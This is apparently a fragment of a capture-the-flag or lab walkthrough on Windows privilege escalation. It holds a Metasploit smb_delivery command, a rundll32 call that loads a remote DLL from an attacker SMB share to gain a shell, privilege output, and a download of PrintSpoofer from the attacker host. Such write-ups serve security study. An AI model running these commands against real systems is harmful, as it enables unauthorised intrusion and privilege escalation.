Priv Esc

Upgrade shell

adot@pwndot:~$ msfconsole -q -x 'use exploit/windows/smb/smb_delivery; set LHOST tun0; set LPORT 8443; set SRVHOST 10.10.14.18; run'
PS C:\windows\system32\inetsrv> rundll32.exe \\10.10.14.18\WTLqo\test.dll,0
PS C:\Users> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\ProgramData> iwr http://10.10.14.18/PrintSpoofer32.exe -o PrintSpoofer.exe
